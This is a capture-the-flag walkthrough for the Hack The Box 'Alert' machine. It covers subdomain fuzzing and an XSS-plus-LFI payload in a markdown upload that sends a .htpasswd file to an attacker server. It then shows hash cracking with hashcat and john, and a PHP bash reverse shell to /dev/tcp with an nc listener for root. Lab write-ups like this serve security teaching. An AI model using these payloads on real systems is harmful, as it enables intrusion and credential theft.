Alert

Writeup of Alert machine

Machine
Link

Reconnaissance

Nmap Scanning Process

Nmap, a network discovery tool, involves several steps:

  1. Host Discovery: Identify live hosts using ICMP, TCP, or UDP packets.

  2. Port Scanning: Scan for open ports on discovered hosts.

  3. Service Detection: Determine running services and versions on open ports.

  4. OS Detection: Detect the operating system of remote hosts.

  5. Script Scanning: Use Nmap scripts for tasks like vulnerability detection.

  6. Output Options: Save results in various formats for analysis or reporting.

These steps aid in mapping network topology and assessing security. The picture shows the machine has two open ports. 80 & 22.

Result of Nmap
  • Port 80: This port is commonly used for HTTP (Hypertext Transfer Protocol) traffic, which forms the foundation of the web. It is the default port for web servers to accept requests from web browsers over an unencrypted connection.

  • Port 22: Known as the default port for SSH (Secure Shell), it allows secure management and data transfer over unsecured networks. SSH is commonly used for remote server management and secure file transfers.

Subdomain Discovery Using Fuzzing Method

The fuzzing method involves sending a series of test inputs to identify valid subdomains for a given domain. The ffuf (Fuzz Faster U Fool) tool can be used to automate this process by:

  1. Command Structure: The basic command format includes the target domain, header options, and wordlist.

  2. URL and Header: Specify the URL you are targeting and use the -H option to set a header with a placeholder (FUZZ) for potential subdomains.

  3. Wordlist: Utilize a wordlist containing common subdomain names to systematically test each entry. The -w option specifies the path to this list.

  4. Status Code Filtering: Use -fc to filter out certain HTTP status codes (e.g., 301) to focus on potential subdomains that yield different responses.

This fuzzy testing helps uncover hidden or unlisted subdomains by systematically trying each entry in the provided wordlist.

ffuf -c -u http://alert.htb -H "Host: FUZZ.alert.htb" -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fc 301
Finding sub-domain by Fuzzing

http://statistics.alert.htb -> Asked Username & Password

http://alert.htb -> Output below

Web

Identifying Bugs

Through analysis, it is clear that the page accepts a markdown (.md) file as input and visualizes. After doing some tests on Burpsuite, I suspected the XXS injection and decided to try.

Burp Suite is a powerful web vulnerability scanner and testing framework used primarily for assessing the security of web applications.

Exploitation

Our payload will look like 👏

Hosting a Malicious Server

python3 -m http.server 8888

Malicious Markdown File (MD File)

<script>
fetch("http://alert.htb/messages.php?file=filepath")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.xx.xx:8888/?file_content=" + encodeURIComponent(data));
  });
</script>
//xx.xx => Should be replaced by your local IP

The application's LFI vulnerability was exploited when this file was uploaded in order to get private files and send their contents to my Python server. I received the vulnerable 'filepath'.

To get the password of user, I accessed the .htpasswd vulnerable file from statistics subdomain, where it was initially asking user's username and password.

.htpasswd file, a flat-file used to store usernames and password for basic authentication on an Apache HTTP Server.

<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.21.21:8888/?file_content=" + encodeURIComponent(data));
  });
</script>
Uploading the payload
Triggering the exploit

User Flag

Output

So, the encrypted password of the user will be:

%3Cpre%3Ealbert%3A%24apr1%24bMoRBJOg%24igG8WBtQ1xYDTQdLjSWZQ%2F%0A%3C%2Fpre%3E%0A

Put it on the CyberChef and decode it by URL Decoding Recipe : Result

albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
username -> albert
encrypted password as a hash -> $apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/

In order decrypt the password, we need to identify the type of hash. Here, I used hashcat cheatsheet and got it

1600

Apache $apr1$ MD5, md5apr1, MD5 (APR)

Hashcat is a powerful password recovery tool that supports many hashing algorithms and attack modes. It is known for its speed, versatility, and GPU acceleration, making it ideal for security testing and forensics.

hashcat -m 1600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Since hashcat requires quite huge amount of memory, you can use john the ripper tool.


john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long hash.txt
Password of user

BOOM!!!

Go login as a user and read the user.txt file.

ssh albert@10.10.11.44

Root Flag

Privilege Escalation

LinPEAS.sh is a script designed to enumerate possible paths to escalate privileges on Linux systems. It automates the process of searching for potential vulnerabilities and misconfigurations that could be exploited to gain higher-level access, making it a useful tool for system administrators and security professionals in identifying and mitigating risks.

Open port: 8080

ssh -L 8080:127.0.0.1:8080 albert@alert.htb

Testing the open port locally using ssh

Accessing Locally

The most interesting part is that the /opt directory has root permissions, providing a great opportunity to upload our shell and execute it from the browser.

1

Create shell.php file

<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.**.**/4444 0>&1'"); ?>
2

Insert the file into /opt/website-monitor/config directory

3

Start netcat listener

nc -lnvp 4444
4

Execute the shell from the port 8080

http://127.0.0.1:8080/config/shell.php

The End!!! 🔚

Thank you!!! 🙏

Last updated